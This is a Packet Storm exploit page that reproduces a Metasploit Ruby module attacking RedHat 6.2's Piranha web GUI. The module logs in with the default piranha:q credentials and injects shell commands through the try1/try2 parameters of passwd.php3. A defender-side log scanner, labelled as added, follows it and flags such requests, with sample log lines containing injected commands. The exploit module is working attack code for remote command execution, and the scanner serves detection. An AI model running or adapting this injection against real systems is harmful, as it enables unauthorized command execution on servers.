RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution

15 Feb 2010 00:00:00 | Reported by patrick | Type: packetstorm | Source: packetstormsecurity.com


Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2000-0248 | 18 Oct 2010 00:00 | circl |
| Circl | CVE-2000-0322 | 18 Oct 2010 00:00 | circl |
| CVE | CVE-2000-0248 | 26 Apr 2000 04:00 | cve |
| CVE | CVE-2000-0322 | 13 Oct 2000 04:00 | cve |
| Cvelist | CVE-2000-0248 | 26 Apr 2000 04:00 | cvelist |
| Cvelist | CVE-2000-0322 | 13 Oct 2000 04:00 | cvelist |
| Metasploit | RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution | 14 Feb 2010 20:27 | metasploit |
| NVD | CVE-2000-0248 | 24 Apr 2000 04:00 | nvd |
| NVD | CVE-2000-0322 | 24 Apr 2000 04:00 | nvd |
| Tenable Nessus | Piranha's RH6.2 default password | 25 Apr 2000 00:00 | nessus |

```ruby
##
# $Id: piranha_passwd_exec.rb 8497 2010-02-14 20:27:24Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution',
      'Description'    => %q{
          This module abuses two flaws - a metacharacter injection vulnerability in the
        HTTP management server of RedHat 6.2 systems running the Piranha
        LVS cluster service and GUI (rpm packages: piranha and piranha-gui).
        The vulnerability allows an authenticated attacker to execute arbitrary
        commands as the Apache user account (nobody) within the
        /piranha/secure/passwd.php3 script. The package installs with a default
        user and password of piranha:q which was exploited in the wild.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8497 $',
      'References'     =>
        [
          [ 'CVE', '2000-0322' ],
          [ 'CVE', '2000-0248' ],
          [ 'OSVDB', '1300' ],
          [ 'OSVDB', '289' ],
          [ 'BID', '1149' ],
          [ 'BID', '1148' ],
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic',
              # inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
              # others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
            }
        },
      'Targets'        =>
        [
          [ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
        ],
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
        OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
      ], self.class)
  end

  def exploit
    cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
    str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
    print_status("Sending GET request with encoded command line...")
    res = send_request_raw({
      'uri'     => str,
      'method'  => 'GET',
      'headers' => {
        'content-type' => 'application/x-www-form-urlencoded',
      },
    }, 3)

    if (res.code == 401)
      print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
    elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
      print_status("Command successfully executed (according to the server).")
    end

  end

end
```
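
A defender-side check for the request this module sends, added here as an example (it is not part of the Metasploit module or the Piranha package): it scans Apache access-log lines for `passwd.php3` requests whose `try1`/`try2` values decode to shell metacharacters, and uses the status code to separate attempts stopped by authentication from ones that reached the script. The log layout, the metacharacter set and the sample lines are assumptions.

```ruby
require 'uri'

# Apache common/combined log prefix: host ident authuser [time] "METHOD target PROTO" status
LOG_RE      = /\A(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})/
TARGET_PATH = '/piranha/secure/passwd.php3' # script named in the module
PARAMS      = %w[try1 try2].freeze          # fields the module appends ";<command>" to
SHELL_META  = /[;|&`$()<>\n]/               # assumption: never legitimate in these fields

# Constructed sample lines (documentation address ranges, harmless commands).
SAMPLE_LOG = <<~'LOG'
  192.0.2.10 - piranha [15/Feb/2010:10:00:01 +0000] "GET /piranha/secure/passwd.php3?try1=q+;%69%64&try2=q+;%69%64&passwd=ACCEPT HTTP/1.0" 200 512
  192.0.2.11 - - [15/Feb/2010:10:00:05 +0000] "GET /piranha/secure/passwd.php3?try1=x%3Buname&try2=x&passwd=ACCEPT HTTP/1.0" 401 401
  198.51.100.7 - piranha [15/Feb/2010:10:02:00 +0000] "GET /piranha/secure/passwd.php3?try1=N3wPass&try2=N3wPass&passwd=ACCEPT HTTP/1.0" 200 498
  198.51.100.7 - piranha [15/Feb/2010:10:03:00 +0000] "GET /piranha/secure/index.php3 HTTP/1.0" 200 2048
LOG

# Percent-decode one component; malformed escapes are kept raw so they are still inspected.
def decode(text)
  URI.decode_www_form_component(text).scrub
rescue ArgumentError
  text.scrub
end

# Returns nil for unrelated or clean lines, otherwise a finding for triage.
def inspect_line(line)
  m = LOG_RE.match(line) or return nil
  host, user, target, status = m.captures
  path, query = target.split('?', 2)
  return nil unless decode(path).squeeze('/') == TARGET_PATH

  params = query.to_s.split('&').map { |pair| pair.partition('=') }
                .select { |k, _, v| PARAMS.include?(decode(k)) && decode(v).match?(SHELL_META) }
                .map { |k, _, _| decode(k) }.uniq
  return nil if params.empty?

  # Same status split the module uses: 401 = stopped by auth, 200 = request reached the script.
  outcome = { '401' => :rejected_by_auth, '200' => :reached_script }.fetch(status, :other)
  { host: host, user: user, params: params, outcome: outcome }
end

def scan(log)
  log.each_line.map { |l| inspect_line(l.chomp) }.compact
end

scan(SAMPLE_LOG).each { |finding| puts finding }
```

A `:reached_script` finding is the one to escalate, since the module description states that injected commands run as the Apache account (nobody).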
